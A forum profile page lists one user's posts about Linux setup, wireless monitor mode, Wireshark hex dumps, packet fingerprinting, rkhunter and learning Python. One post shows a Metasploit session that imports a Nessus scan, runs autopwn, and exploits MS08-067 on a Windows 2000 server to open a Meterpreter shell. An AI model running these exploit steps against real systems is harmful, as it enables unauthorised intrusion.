• Content count

  • Joined

  • Last visited

Everything posted by rocky

  1. Try the following command: iwconfig [interface] mode monitor This command will put your wireless interface into RFMON mode. Please read:
  2. I recommend using VMWare Server - which is free to download and install - for running Linux. This way during the course of your learning any mistakes you may make will only affect the virtual machine. You may find that in the future you will want to use Linux as your main operating system but in the mean time however if your goal is to simply learn Linux while still retaining the functionality of Windows give the virtualization method a shot. VMWare is fairly straight forward to install and to use as well. An added bonus will be learning two new skills -- always a plus!
  3. For finding vulnerabilities I would checkout Nessus or SAINT. What's cool about using Nessus is that you can load an exported Nessus scan right into Metasploit making the process much more automated. autopwn using an exported NBE Nessus scan file against a Windows 2000 Server pansy box. msf > db_create [*] Creating a new database instance... [*] Successfully connected to the database [*] File: /root/.msf3/sqlite3.db msf > db_import_nessus_nbe /root/nessus1026.nbe msf > db_services [*] Time: 2009-11-26 15:33:20 -0800 Service: host= port=139 proto=tcp state=up name=netbios-ssn [snip] [*] Time: 2009-11-26 15:33:23 -0800 Service: host= port=135 proto=udp state=up name=epmap msf > db_vulns [*] Time: 2009-11-26 15:33:20 -0800 Vuln: host= port=139 proto=tcp name=NSS-11011 refs= [snip] [*] Time: 2009-11-26 15:33:25 -0800 Vuln: host= port=445 proto=tcp name=NSS-11110 refs=CVE-2002-0724,BID-5556,OSVDB-2074 msf > db_autopwn -p -t -e A more manual exploit against a Windows 2000 Server pansy box. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST RHOST => msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set LHOST LHOST => msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows 2000 Service Pack 0 - 4 - lang:English [*] Selected Target: Windows 2000 Universal [*] Triggering the vulnerability... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened ( -> meterpreter >
  4. I believe that this Slackware networking tutorial will answer your question about wpa_supplicant and WPA2:
  5. In fact lspci -k will show the kernel modules.
  6. You need the -v switch for lspci to show you which module is in use. lspci -v If you use the verbose switch you get more detailed information about each PCI device, but the same devices are displayed regardless if the switch is present.
  7. lspci might be the command you're looking for.
  8. Dial Tone, Cool man I can respect that. Try this: First you have to format the hex data you have to the format that text2pcap wants: 000000 00 0f db cb 06 6a 00 03 93 ed 1d 83 08 00 45 18 000010 00 47 30 7d 00 00 ff 11 07 5e c0 a8 01 61 c0 a8 000020 01 01 14 e9 00 35 00 33 96 ce 4c 24 01 00 00 01 000030 00 00 00 00 00 00 02 39 37 01 31 03 31 36 38 03 000040 31 39 32 07 69 6e 2d 61 64 64 72 04 61 72 70 61 000050 00 00 0c 00 01 next use text2pcap on the file you have saved this data into. Try that; it totally worked for me, I was able to open the file in wireshark and everything.
  9. Hi Dirk Chesnut, Not really knowing much about rkhunter, I actually went and downloaded rkhunter and ran it and it must do some sort of generic profiling which then is compared to the current state of your system, because I got some errors, mostly innocuous ones though. After that it must store information of the last known state, being the last time it was run, into the /var/lib/rkhunter directory in a file called db, which I'm assuming is for database. Now I'm parroting you, however that is what I meant by database in my previous post, a file that contains the profile of your local machine of the last known state which is then compared against the current state when you run rkhunter, which is bound to produce false positives. Good post by the way.
  10. I think his professor is trying to get him to take an IP packet, analyze the data, then deduce what operating system it came from. It's already in hex and only the data portion would produce useful information from an ascii conversion. 00 1a 70 fb f7 77 00 13 02 a9 97 97 08 00 45 00 00 45 c7 98 00 00 80 11 25 f9 c0 a8 01 65 4a dc 40 2d d6 08 00 35 00 31 d0 9e 1c 86 01 00 00 01 00 00 00 00 00 00 03 77 77 77 0f 74 68 65 66 65 64 6f 72 61 6c 6f 75 6e 67 65 03 63 6f 6d 00 00 01 00 01 Above is a DNS request from a Windows XP laptop I have to the DNS server of my ISP that I took directly from Wireshark. The TTL is 0x80 or 128, which is a clear indicator that's it's a Windows machine. I think in the above case, the hex data that Dial Tone posted, it was just a matter of fingerprinting by determining the TTL.
  11. I've never used rkhunter but it appears to use a database and then does a comparison of the database against the current state of your system. I wouldn't be too worried about the inode number change. You said that you updated your system? That is most likely the culprit.
  12. Here's what I found from analyzing the information: 000fdbcb066a000393ed1d830800[iP packet]4518 0047307d0000ff[TTL]11[udp]075ec0a80161[source address]c0a80 101[destination address]14e9[source port]0035[destination port]003396ce4c24010000010 00000000000023937013103313638033 1393207696e2d6164647204617270610 00[data]00c0001 List of TTL by operating system:
  13. Now I'm probably wrong but here's what I got: IP packet Unix like operating system UDP source address destination address source port 5353 destination port 53/DNS Here's what the data portion says: ?97?1?168?192?in-addr?arpa??
  14. The opposite: I have text data I want to be hex. Think of it as if in programming, you stored "12345" as a string instead of an integer. Cool, so you if have a text file use xxd as a previous poster noted(sorry for being overzealous). But because I'm kind of thick skulled, is this what you're aiming for? $ cat file.txt This is example text. $ xxd file.txt file.out $ cat file.out 0000000: 5468 6973 2069 7320 6578 616d 706c 6520 This is example 0000010: 7465 7874 2e0a text..
  15. Are you trying to save data from wireshark? If so use the export function, and if you're just looking to save a frame or less use the export Selected Packet Bytes in File > Export > Selected Packet Bytes, after you have this saved it will be a binary file so as a previous poster suggested use xxd to get a hex dump to standard out or use redirection to save the output of the xxd hex dump into a text file. I think this is what you're asking, if not my apologies. EDIT: Also there is usually a hexdump command, using no flags, on most Linux installs that will give you just hex, no ascii, which I think is pretty much the same output of od -x <filename>.
  16. Hey man, As a beginning programmer myself I can definitely attest to learning Python. Actually when I was a teenager I had a complex of wanting to learn only hard stuff. I read a lot of philosophy and literature but I was also into computers and tried learning 68k assembler and C and C++. However there were way too many blank spots in my understanding so I just gave up, this was also coupled with my young male ego believing that I could learn anything, even the hard stuff- especially the hard stuff- because I thought I was a pretty smart cookie. Later on after having become a bit more humble and returning to computers after a couple years of not using them, I wanted to try my hand at programming again but this time I didn't want to go straight for the hard stuff so I picked Python, which I'm still learning, but I have to say that when you actually grasp what you're learning and have fun discovering and surmounting new concepts it feels pretty good and it has actually made reading code, admittedly mostly simple stuff, in other languages a little bit clearer.
  17. I think that the problem with Windows lies not with the operating system entirely but rather with how the average person uses a computer and one would find that if those same uniformed users were to use a different operating system, I would venture to bet that many of the same problems/complaints would arise. I hope I'm not being redundant by saying this: most people view computers as a black box that just merely works or if it doesn't it's for some inexplicable reason, which I think largely lies with the GUI metaphor that obfuscates what is going on behind the scenes. But just as in the world outside of computers most people wish to remain ignorant of what is really happening behind the scenes. Not to imply that there aren't Windows users, or Mac OS users, or whatever OS users who aren't wizards and really do know their operating systems inside out. It only happens that Windows is the de facto operating system for the majority of computer users so there are bound to be more users who are passive consumers who use Windows. Also Linux is marketed, if that's even the correct word, strangely to say the least. There is no killer app outside of the operating system, or kernel, which to the average user is null because most users just want their shit to work and they aren't thinking of the OS. I think that most people want what works and they want something that they paid for, especially in a society as driven by consumerism as the one we have. Open source software is a diverse labor of love, also driven by financial gain too, with some wonderful creations by some truly ingenious people however unless you're the type of person willing to deal with change and the occasional hiccup you'll probably be pretty bummed on Linux and again I think it most has to do with users rather than entirely with operating systems. Anyway I hope that this post is keeping on topic. I really like this forum.
  18. Hey, My name's Rocky. I don't really post on forums too often however I've really enjoyed reading through this forum and I thought I'd join. I don't know if I'll post much so perhaps even this post is in vain although I'd like to contribute to any threads where I can add something useful. Anyway... peace, Rocky
  19. Hey, I'm new to the forum. I noticed that you, swerve, are using Ubuntu as your host OS. To easily get VMWare Server running on Ubuntu use this tutorial The tutorial advises not to mess around with the rpm rather that you should go straight for the tar.gz archive instead. Rocky